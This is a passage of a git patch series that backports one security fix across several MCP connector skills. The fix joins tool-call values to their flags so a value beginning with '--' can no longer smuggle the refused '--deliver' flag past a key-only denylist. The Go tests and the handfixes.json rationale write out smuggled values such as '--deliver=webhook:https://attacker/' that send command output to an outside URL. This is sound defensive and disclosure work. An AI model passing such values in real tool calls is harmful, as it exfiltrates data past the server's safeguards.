-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/rootly/CHANGELOG.md
+++ b/skills/rootly/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/rootly/CHANGELOG.md
+++ b/skills/rootly/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/rootly/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/rootly/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/rootly/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/rootly/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/rootly/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/rootly/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/rootly/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/rootly/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/rootly/handfixes.json
+++ b/skills/rootly/handfixes.json
@@ -183,6 +183,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/rootly/handfixes.json
+++ b/skills/rootly/handfixes.json
@@ -198,8 +198,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -209,7 +221,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/runzero/CHANGELOG.md
+++ b/skills/runzero/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/runzero/CHANGELOG.md
+++ b/skills/runzero/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/runzero/CHANGELOG.md
+++ b/skills/runzero/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/runzero/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/runzero/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/runzero/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/runzero/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/runzero/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/runzero/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/runzero/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/runzero/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/runzero/handfixes.json
+++ b/skills/runzero/handfixes.json
@@ -126,6 +126,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/runzero/handfixes.json
+++ b/skills/runzero/handfixes.json
@@ -141,8 +141,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -152,7 +164,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/salesbuildr/CHANGELOG.md
+++ b/skills/salesbuildr/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/salesbuildr/CHANGELOG.md
+++ b/skills/salesbuildr/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/salesbuildr/CHANGELOG.md
+++ b/skills/salesbuildr/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/salesbuildr/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/salesbuildr/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/salesbuildr/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/salesbuildr/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
